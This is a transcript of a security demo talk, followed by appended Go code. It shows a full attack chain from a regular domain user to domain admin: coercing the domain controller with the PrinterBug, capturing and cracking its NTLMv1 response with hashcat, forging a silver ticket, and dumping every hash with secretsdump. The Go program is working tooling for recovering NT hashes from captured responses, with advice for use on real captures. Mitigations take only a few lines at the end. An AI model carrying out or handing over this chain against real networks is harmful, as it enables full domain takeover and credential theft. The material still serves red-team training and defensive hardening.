Hi everybody, it's Evilmog from Team Hashcat and also X-Force Red. I'm here to talk to you all about a fantastic chain of vulnerabilities that leads to domain admin. I call this "printers to domain admin". So, first off, what we're going to be exploiting is this wonderful feature that tifkin_ from SpecterOps discovered, called the MS-RPRN PrinterBug. Basically, it's a feature that has a domain controller tell a client where its printers are. Now, any user can request that this packet be sent to them, and what it can also do is try and enforce authentication. Now, if the client says, "hey, I only support NTLM version 1", and the domain controller is trying to authenticate to it, it will authenticate using its machine account. That machine account's NTLM version 1 response can then be reversed to NTLM. And once we've reversed it to NTLM, we can create a silver ticket and then DCSync the server. So with that, let's begin. The first thing we're going to need to do is find out the domain SID of the machine we're going to attack. Now, we're going to specify that we start off with domain user credentials, so we are already a regular domain user. We would have gotten this through Responder, some other method, or by being a legitimate user on the network. So we're running enum4linux against 192.168.1.3 on my mog.local domain. Now, we're going to see a whole bunch of stuff, so we're going to have to scroll up, and we'll see the domain SID right here. This is the security identifier for the domain, and it did not require any credentials to pull. So we're going to go export SID=, and even though these aren't required, I put them around it just for my own safety's sake, because I've been burned once or twice. So we now have the SID. Fantastic. The next thing we're going to need is to use our credentials with the NetNTLM silver ticket repo, with a tool called Dementor. So we're now in the repo, so we're going to go ./ or python dementor.py.
So in order to use Dementor, we need a domain username, which is going to be evilmog. We need a password; in this case the password is "password" with an exclamation mark. Yes, this is a demo. Yes, it's junk. I'm okay with this. Next we're going to use a domain: the domain name is mog.local. The next thing we're going to do is go into another window and set up Responder. So Responder, interface of eth0, yeah, let's go with that. And now we're going to fire over to Dementor and fire off the authentication back at us. The next thing we're going to need is the listener IP. So the IP range on this, sorry, it was listener and target. So $attackerIP; I pre-exported mine because I can't remember what it was. And we're going to go with the target IP. It's going to send the attack. We're seeing access denied. Here we'll see an NTLMv1-SSP hash. Now you'll see I attempted to set the client challenge to 1122334455667788, but it zeroed these out. I could have specified --lm and it would have gotten me a better result, but in this case I wanted to demonstrate NTLM version 1 with SSP on video because it's fun. So we're going to copy this. I'm now going to go into my ntlmv1-multi tool: python ntlmv1.py, specifying ntlmv1 and our hash. Now if you want to use crack.sh and pay $200, you absolutely can. The other option is to do this with Hashcat. Now this will normally take you about three to five days with, you know, 16 to 32 GPUs. It'll cost you about $1,000 in AWS time. I haven't timed this out for a while, so my numbers might be inaccurate, but on 16 GTX 1080s it takes about four or five days. So what we're going to do is copy the mode 14000 hash, because it's already ready to go into Hashcat. We're going to go into my Hashcat directory and paste that. Just make sure it's a fresh file; nothing up my sleeve. Now we're going to take the command it told us to crack it with in Hashcat.
It's telling us to use mode 14000, attack mode 3, which is a brute force, using the DES character set, and our attack mask, already filled in for you. Now because I have a time machine, it's going to crack instantly. Perfect, see? It's already cracked instantly. So let's go show these hashes right now. So here we have a portion of the NTLM, but it's actually being returned as a DES key. We need to convert these DES keys into portions of an NTLM. So we're going to pull up my hashcat-utils src, and we're going to want deskey_to_ntlm. So here is part one. We are then going to do part two. What was that, back over here? Part two. Now the most important part: we're also going to have to calculate the last four characters of the NTLM. Again, there's already a hashcat-utils tool for that, so we're going to go into git/hashcat-utils/src, and then we are going to use ct3_to_ntlm. But it already tells us that, because we do the paste, and there we are. We have our NTLM. So the NTLM is going to be part one, part two, part three. Fantastic. So now we're going back into our handy-dandy utility: export NTLM=. Now, to prove there's nothing up my sleeve on this one: CrackMapExec, smb 192.168.1.3, the username is going to be DC1$, because the dollar sign means it's a machine account, and we're going to use the hash $NTLM. And there we are: we've authenticated as the domain machine account. Now we're going to run ticketer. Now this command is a little bit complex. So first we're going to run Python and select where our ticketer location is. We're going to use the NTLM hash, which we'll see here starts with 1D and matches right up with what we have here, ending in 904C. So that's your NTLM hash for the machine account. There is the domain SID that we captured earlier; that is this S-1-5-21 here from enum4linux. The domain name here is mog.local. Now the important part is the SPN. SPN is a service principal name.
So in this case, we know it's a machine. So we know it's DC1, and we know it's in mog.local. All domain controllers by default will, or should in most cases, have a host/DC, or a host/ something, for their SPN. So we can guess this machine's SPN, or look at it in BloodHound, but in this case we guessed: host/dc1.mog.local, and then the user, administrator, guessing it's administrator, which it probably is. A lot of people change it, but that is how we create our silver ticket. Now I'm going to hit enter. It's going to create this Kerberos ccache file for you. Now you need to go run an export. Since I keep forgetting the syntax: history | grep export | grep ccache | head -n1, there we go, export. So we've specified here's where our cache file is. Now we're going to proceed to secretsdump the domain controller: history | grep secretsdump, okay, head -n1, there we go. So we're going to run secretsdump. The syntax for this one is going to be, you know, our python3 secretsdump.py; -k means use Kerberos, -no-pass means don't ask for a password. We're going to specify mog/administrator@dc1.mog.local, and we're going to DCSync the... interesting. This happens; let's go take a look. There we go, that's the right tool. So the syntax for this one was Python running secretsdump, our target was administrator@dc1.mog.local, -k was use Kerberos, -no-pass was don't ask for a password. And here we see our administrator hash, our guest hash, and our machine account, which we just finished extracting. So that is how you silver ticket a domain controller and DCSync it with just a regular domain user. Now for mitigations on this, what you're going to wind up doing is: there's a setting called the LmCompatibilityLevel. I'll include a link to it in the slides for this. If it's set to 2 or lower, which basically means allow NTLM, this works. If you increase that setting to 5, that will completely block this.
The other mitigation is to disable the Print Spooler service on any sensitive server, such as domain controllers. Now this will cause an impact in some environments, as clients will no longer be able to update the printer list, but hopefully you have a better way of pushing printers, such as SCCM. So that is the one downside, but it will prevent domain controllers from reaching out. This works up until Server 2016. I have not seen it work in Server 2019, and again it depends on your LmCompatibilityLevel. Thank you very much for tuning in. This has been Evilmog from X-Force Red and Team Hashcat.
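The reversal step the talk walks through (NTLMv1-SSP capture, hashcat mode 14000 on the first two DES blocks, deskey_to_ntlm on the cracked keys, ct3_to_ntlm for the last four hex characters) worked end to end, as an added example that is not code from the talk, from ntlmv1-multi, or from hashcat-utils. It uses Go's standard crypto/des and crypto/md5 only. Inputs are constructed: the NT hash of "Password" and the server challenge 0123456789abcdef are the MS-NLMP test vectors, the client challenge 1122334455667788 is fixed by hand, and hashcat's output is stood in for by expanding the known NT hash into its DES keys. Two things it makes visible that the walkthrough glosses over: under SSP the DES plaintext is MD5(server challenge || client challenge)[:8], not the server challenge itself, and hashcat hands back 8-byte DES keys whose parity bits have to be stripped before the bytes are NT-hash bytes again.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/md5"
	"encoding/hex"
	"fmt"
)

// expandDESKey spreads 7 key bytes over 8, leaving each byte's low bit for parity:
// the form DES consumes and the form in which hashcat -m 14000 prints a cracked key.
func expandDESKey(k7 []byte) []byte {
	k8 := make([]byte, 8)
	for i := 0; i < 7; i++ {
		k8[i] |= (k7[i] >> i) & 0xfe
		k8[i+1] = k7[i] << (7 - i)
	}
	return k8
}

// desKeyToNTLM inverts expandDESKey (what hashcat-utils deskey_to_ntlm does):
// drop the parity bits and pack the 56 key bits back into 7 NT-hash bytes.
func desKeyToNTLM(k8 []byte) []byte {
	k7 := make([]byte, 7)
	for i := 0; i < 7; i++ {
		k7[i] = (k8[i]&0xfe)<<i | k8[i+1]>>(7-i)
	}
	return k7
}

// desBlock encrypts one 8-byte block under an 8-byte DES key (parity bits are ignored).
// Every caller passes exactly 8 key bytes, so NewCipher's only error case cannot occur.
func desBlock(key8, in []byte) []byte {
	c, _ := des.NewCipher(key8)
	out := make([]byte, 8)
	c.Encrypt(out, in)
	return out
}

// ntlmv1Response is DESL(ntHash, challenge): the 16-byte NT hash padded to 21 bytes
// gives three 7-byte DES keys, and each one encrypts the same 8-byte challenge.
func ntlmv1Response(ntHash, challenge []byte) ([]byte, error) {
	if len(ntHash) != 16 || len(challenge) != 8 {
		return nil, fmt.Errorf("need a 16-byte NT hash and an 8-byte challenge")
	}
	padded := make([]byte, 21)
	copy(padded, ntHash)
	var resp []byte
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(expandDESKey(padded[i:i+7]), challenge)...)
	}
	return resp, nil
}

// essChallenge is what the DES keys were really applied to under NTLMv1-SSP:
// MD5(serverChallenge || clientChallenge)[:8]. Plain NTLMv1 uses the server challenge as is.
func essChallenge(serverChal, clientChal []byte) []byte {
	sum := md5.Sum(append(append([]byte{}, serverChal...), clientChal...))
	return sum[:8]
}

// ct3ToNTLM recovers the last two NT-hash bytes (hashcat-utils ct3_to_ntlm): key three
// is those two bytes plus five zero bytes, so at most 65536 trial encryptions are needed.
func ct3ToNTLM(ct3, challenge []byte) ([]byte, bool) {
	k7 := make([]byte, 7)
	for t := 0; t < 1<<16; t++ {
		k7[0], k7[1] = byte(t>>8), byte(t)
		if bytes.Equal(desBlock(expandDESKey(k7), challenge), ct3) {
			return []byte{k7[0], k7[1]}, true
		}
	}
	return nil, false
}

// recoverNTHash rebuilds the NT hash from the two DES keys hashcat reports plus the
// brute-forced tail, first checking that each key really produces its ciphertext block.
func recoverNTHash(ntResp, challenge, key1, key2 []byte) ([]byte, error) {
	if len(ntResp) != 24 || len(challenge) != 8 || len(key1) != 8 || len(key2) != 8 {
		return nil, fmt.Errorf("need a 24-byte NT response, an 8-byte challenge and two 8-byte keys")
	}
	var nt []byte
	for i, k := range [][]byte{key1, key2} {
		if !bytes.Equal(desBlock(k, challenge), ntResp[8*i:8*i+8]) {
			return nil, fmt.Errorf("key %d does not encrypt the challenge to block %d", i+1, i+1)
		}
		nt = append(nt, desKeyToNTLM(k)...)
	}
	tail, ok := ct3ToNTLM(ntResp[16:], challenge)
	if !ok {
		return nil, fmt.Errorf("block 3 matches no two-byte tail")
	}
	return append(nt, tail...), nil
}

func main() {
	// Constructed values, nothing captured: NT hash of "Password" and the server
	// challenge from the MS-NLMP test vectors, plus a fixed client challenge (SSP case).
	nt, _ := hex.DecodeString("a4f49c406510bdcab6824ee7c30fd852")
	serverChal, _ := hex.DecodeString("0123456789abcdef")
	clientChal, _ := hex.DecodeString("1122334455667788")
	chal := essChallenge(serverChal, clientChal)
	resp, _ := ntlmv1Response(nt, chal)
	fmt.Printf("hashcat -m 14000 -a 3 lines: %x:%x and %x:%x\n", resp[:8], chal, resp[8:16], chal)
	// Stand-in for hashcat's output: the DES keys it would print for blocks 1 and 2.
	got, err := recoverNTHash(resp, chal, expandDESKey(nt[:7]), expandDESKey(nt[7:14]))
	fmt.Printf("recovered NT hash %x err=%v matches=%v\n", got, err, bytes.Equal(got, nt))
}
```

The check in recoverNTHash that each cracked key actually encrypts the challenge to its block is the one to keep when wiring this to real captures: feeding the raw server challenge into the SSP case, or a Responder line whose LM field was not the client challenge plus zeros, fails there instead of producing a plausible-looking but wrong NT hash that CrackMapExec then rejects.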